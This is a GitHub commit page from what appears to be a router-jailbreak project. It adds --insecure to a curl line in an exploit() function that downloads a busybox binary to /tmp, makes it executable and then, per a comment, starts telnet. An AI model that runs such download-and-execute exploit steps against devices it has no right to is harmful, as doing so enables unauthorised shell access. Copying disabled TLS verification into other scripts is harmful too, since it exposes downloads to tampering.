Skip to content

Commit

Permalink
Add --insecure to the curl command, to avoid problems with SSL when t…
Browse files Browse the repository at this point in the history
…he user runs the script in a complex network setup. See: #31 (comment)
  • Loading branch information
acecilia committed Sep 11, 2020
1 parent db0949c commit 7bc75a6
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion script.sh
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,8 @@ exploit() {

cd /tmp
rm -rf busybox
curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --output busybox
# Rationale for using --insecure: https://github.com/acecilia/OpenWRTInvasion/issues/31#issuecomment-690755250
curl "https://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-mipsel" --insecure --output busybox
chmod +x busybox

# Start telnet
Expand Down

0 comments on commit 7bc75a6

Please sign in to comment.